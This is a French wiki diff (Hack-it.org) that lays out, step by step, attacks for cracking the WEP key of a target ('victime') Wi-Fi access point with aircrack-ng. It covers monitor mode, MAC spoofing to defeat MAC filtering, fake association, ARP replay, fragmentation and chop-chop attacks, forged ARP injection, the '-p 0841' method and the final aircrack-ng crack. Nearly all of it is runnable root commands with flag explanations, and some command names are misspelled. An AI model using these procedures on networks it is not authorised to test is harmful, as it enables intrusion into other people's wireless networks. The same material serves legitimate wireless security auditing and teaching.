Aircrack-ng
De Hack-it.org.
(Aircrack-ng, outils et utilisation) |
|||
Ligne 30 : | Ligne 30 : | ||
=== airolib-ng === | === airolib-ng === | ||
Permet de créer une base de données sqlite en vue d'un crack WPA. | Permet de créer une base de données sqlite en vue d'un crack WPA. | ||
- | <br />ATTENTION: Pour fonctionner, vous devez avoir compilé aircrack avec le support pour sqlite. | + | <br />'''ATTENTION: Pour fonctionner, vous devez avoir compilé aircrack avec le support pour sqlite.''' |
=== airtun-ng === | === airtun-ng === | ||
Ligne 51 : | Ligne 51 : | ||
=== tkiptun-ng === | === tkiptun-ng === | ||
Permet d'aider au crack de clés WPA utilisant TKIP. | Permet d'aider au crack de clés WPA utilisant TKIP. | ||
- | <br />ATTENTION: Cet outil n'est pas encore fonctionnel. | + | <br />'''ATTENTION: Cet outil n'est pas encore fonctionnel.''' |
=== wesside-ng === | === wesside-ng === | ||
Ligne 58 : | Ligne 58 : | ||
== Les différents types d'attaques == | == Les différents types d'attaques == | ||
- | TOUTES LES COMMANDES CI-DESSOUS SONT A EFFECTUER EN ROOT | + | '''TOUTES LES COMMANDES CI-DESSOUS SONT A EFFECTUER EN ROOT''' |
<br />Dans les cas ou l'association ne fonctionne pas, il faut couper la carte, changer l'adresse mac de la carte par celle d'un client connecté à la station avec une commande du type "macchanger --mac $mac $iface", et relancer la carte. | <br />Dans les cas ou l'association ne fonctionne pas, il faut couper la carte, changer l'adresse mac de la carte par celle d'un client connecté à la station avec une commande du type "macchanger --mac $mac $iface", et relancer la carte. | ||
Ligne 71 : | Ligne 71 : | ||
=== Mac spoofing === | === Mac spoofing === | ||
Pour les procédures ci-dessous, dans les cas ou l'association ne fonctionne pas, il faut couper la carte, changer l'adresse mac de la carte par celle d'un client connecté à la station avec une commande du type: | Pour les procédures ci-dessous, dans les cas ou l'association ne fonctionne pas, il faut couper la carte, changer l'adresse mac de la carte par celle d'un client connecté à la station avec une commande du type: | ||
- | <br />macchanger --mac $mac $iface | + | <br />>>>macchanger --mac $mac $iface |
<br />et relancer la carte. | <br />et relancer la carte. | ||
=== Méthode "ARP replay" === | === Méthode "ARP replay" === | ||
+ | '''Méthode avec client (en cas de filtrage MAC, spoofer l'adresse MAC du client comme expliqué plus haut)''' | ||
* Mettre carte en monitor: | * Mettre carte en monitor: | ||
>>> ifconfig $iface down | >>> ifconfig $iface down | ||
Ligne 81 : | Ligne 82 : | ||
* Trouver une victime: | * Trouver une victime: | ||
>>> airodump-ng $iface | >>> airodump-ng $iface | ||
- | <br />Couper une fois la victime trouvée | + | <br />''Couper une fois la victime trouvée'' |
- | * Lancer la capture d' | + | * Lancer la capture d'IVs: |
>>> airodump-ng -c $canal -w $fichier_capture $iface | >>> airodump-ng -c $canal -w $fichier_capture $iface | ||
<br />-w = préfixe à utiliser pour le nom du fichier de capture | <br />-w = préfixe à utiliser pour le nom du fichier de capture | ||
- | <br />Laisser tourner... | + | <br />''Laisser tourner...'' |
* Associer la carte à l'AP: | * Associer la carte à l'AP: | ||
Ligne 92 : | Ligne 93 : | ||
<br />-1 = fake association | <br />-1 = fake association | ||
<br />30 = temps d'attente entre 2 tentatives | <br />30 = temps d'attente entre 2 tentatives | ||
- | <br />En cas de succes, "Association successful :-)" doit s'afficher | + | <br />''En cas de succes, "Association successful :-)" doit s'afficher'' |
* Lancer l'injection: | * Lancer l'injection: | ||
>>> aireplay-ng -3 -e $essid_cible -a $bssid_cible -h $mac_client $iface | >>> aireplay-ng -3 -e $essid_cible -a $bssid_cible -h $mac_client $iface | ||
<br />-3 = attaque ARP replay | <br />-3 = attaque ARP replay | ||
- | <br />Surveiller la colonne #Data (correspond aux IVs) dans airodump, en cas de succès cette valeur augmente | + | <br />''Surveiller la colonne #Data (correspond aux IVs) dans airodump, en cas de succès cette valeur augmente'' |
+ | |||
+ | * Lancer le crack de la clé WEP à partir de 10.000 IVs capturés tout en laissant tourner airodump-ng. Si le nombre de paquets est insuffisant, la procédure de crack sera relancée tous les 5000 IVs capturés: | ||
+ | >>> aircrack-ng $fichier_capture | ||
+ | |||
+ | === Methode "chop-chop" et par fragmentation === | ||
+ | '''Méthodes avec ou sans client (si filtrage MAC activé, il faut absolument un client connecté afin de spoofer son adresse MAC comme expliqué plus haut)''' | ||
+ | * Mettre la carte en monitor: | ||
+ | >>> ifconfig $iface down | ||
+ | <br />>>> airmon-ng start $iface | ||
+ | |||
+ | * Trouver une victime: | ||
+ | >>> airodum-ng $iface | ||
+ | <br />''Couper une fois la victime trouvée'' | ||
+ | |||
+ | * Lancer la capture d'IVs: | ||
+ | >>> airodum-ng -c $canal --bssid $bssid_cible -w $fichier_capture $iface | ||
+ | <br />-w = préfice à utiliser pour le nom du fichier de capture | ||
+ | <br />''Laisser tourner...'' | ||
+ | |||
+ | * Associer la carte à l'AP: | ||
+ | >>> aireplay-ng -1 0 -e $essid_cible -a $bssid_cible -h $mac_carte $iface | ||
+ | <br />-1 = fake association | ||
+ | <br />0 = temps d'attente (en ms) entre 2 tentatives | ||
+ | <br />''En cas de succes, "Association successful :-)" doit s'afficher'' | ||
+ | ** En cas d'échec: | ||
+ | >>> aireplay-ng -1 6000 -o 1 -q 10 -e $essid_cible -a $bssid_cible -h $mac_carte $iface | ||
+ | <br />6000 = temps d'attente (en ms) entre 2 tentatives | ||
+ | <br />-o = nombre de jeux de paquets à envoyer à la fois | ||
+ | <br />-q = intervale entre 2 paquets "keep-alive" | ||
+ | |||
+ | * Attaque: | ||
+ | Ces 2 attaques permettent d'obtenir un PRGA (Pseudo Random Generation Algorythme) afin de créer un paquet ARP à injecter. Si l'attaque par fragmentation ne donne rien, on tentera la méthode chop-chop. | ||
+ | <br />Dans les 2 cas, un fichier .xor sera créé en cas de succès. | ||
+ | ** Par fragmentation: | ||
+ | >>> aireplay-ng -5 -b $bssid_cible -h $mac_carte $iface | ||
+ | <br />-5 = attaque par fragmentation | ||
+ | ** Chop-chop: | ||
+ | >>> aireplay-ng -4 -b $bssid_cible -h $mac_carte $iface | ||
+ | <br />-4 = attaque chop-chop | ||
+ | |||
+ | * Création d'un paquet ARP: | ||
+ | >>> packetforge-ng -0 -a $bssid_cible -h mac_carte -k 255.255.255.255 -l 255.255.255.255 -y $fichier_xor -w $fichier_arp | ||
+ | <br />-0 = générer un paquet ARP | ||
+ | <br />-k = IP de destination (la plupart des AP répondent au 255.255.255.255) | ||
+ | <br />-l = IP source (la plupart des AP répondent au 255.255.255.255) | ||
+ | <br />-w = nom du fichier dans lequel mettre le paquet ARP | ||
+ | |||
+ | * Injection de l'ARP: | ||
+ | >>> aireplay-ng -2 -r $fichier_arp $iface | ||
+ | <br />-2 = selection de paquets interactive (accepter le paquet avec "y") | ||
+ | <br />''Surveiller la colonne #Data (correspond aux IVs) dans airodump, en cas de succès cette valeur augmente. En cas d'échec ou d'injection trop lente, couper avec Ctrl+C et utiliser le paquet suivant'' | ||
+ | |||
+ | * Lancer le crack de la clé WEP à partir de 10.000 IVs capturés tout en laissant tourner airodump-ng. Si le nombre de paquets est insuffisant, la procédure de crack sera relancée tous les 5000 IVs capturés: | ||
+ | >>> aircrack-ng $fichier_capture | ||
+ | |||
+ | === Méthode "-p 0841" === | ||
+ | '''Méthode avec ou sans client (si filtrage MAC activé, il faut absolument un client connecté afin de spoofer son adresse MAC comme expliqué plus haut)''' | ||
+ | * Mettre la carte en mode monitor: | ||
+ | >>> ifconfig $iface down | ||
+ | >>> airmon-ng start $iface | ||
+ | |||
+ | * Trouver une victime: | ||
+ | >>> airodump-ng $iface | ||
+ | <br />''Couper une fois la victime trouvée'' | ||
+ | |||
+ | * Lancer la capture d'IVs: | ||
+ | >>> airodump-ng -c $canal --bssid $bssid_cible -w $fichier_capture $iface | ||
+ | <br />-w = préfixe à utiliser pour le nom du fichier de capture | ||
+ | <br />''Laisser tourner...'' | ||
+ | |||
+ | * Associer la carte à la station: | ||
+ | >>> aireplay -1 0 -e $essid_cible -a $bssid_cible -h $mac_carte $iface | ||
+ | <br />-1 = fake association | ||
+ | <br />0 = temps d'attente (en ms) entre 2 tentatives | ||
+ | <br />''En cas de succès, "Association successful :-)" doit s'afficher | ||
+ | ** En cas d'échec: | ||
+ | >>> aireplay-ng -1 6000 -o 1 -q 10 -e $essid_cible -a $bssid_cible -h $mac_carte $iface | ||
+ | <br />6000 = temps d'attente (en ms) entre 2 tentatives | ||
+ | <br />-o = nombre de jeux de paquets à envoyer à la fois | ||
+ | <br />-q = intervale entre 2 paquets "keep-alive" | ||
+ | |||
+ | * Lancer l'injection: | ||
+ | >>> aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b $bssid_cible -h $mac_carte $iface | ||
+ | <br />-2 = sélection de paquets interactive (accepter le paquet avec "y") | ||
+ | <br />-c = considérer l'adresse MAC de l'AP comme une adresse broadcast, force l'AP à renvoyer des paquets | ||
+ | <br />''Surveiller la colonne #Data (correspond aux IVs) dans airodump-ng, en cas de succès cette valeur augmente. En cas d'échec ou d'injection trop lente, couper avec Ctrl+C et utiliser le paquet suivant'' | ||
* Lancer le crack de la clé WEP à partir de 10.000 IVs capturés tout en laissant tourner airodump-ng. Si le nombre de paquets est insuffisant, la procédure de crack sera relancée tous les 5000 IVs capturés: | * Lancer le crack de la clé WEP à partir de 10.000 IVs capturés tout en laissant tourner airodump-ng. Si le nombre de paquets est insuffisant, la procédure de crack sera relancée tous les 5000 IVs capturés: | ||
>>> aircrack-ng $fichier_capture | >>> aircrack-ng $fichier_capture |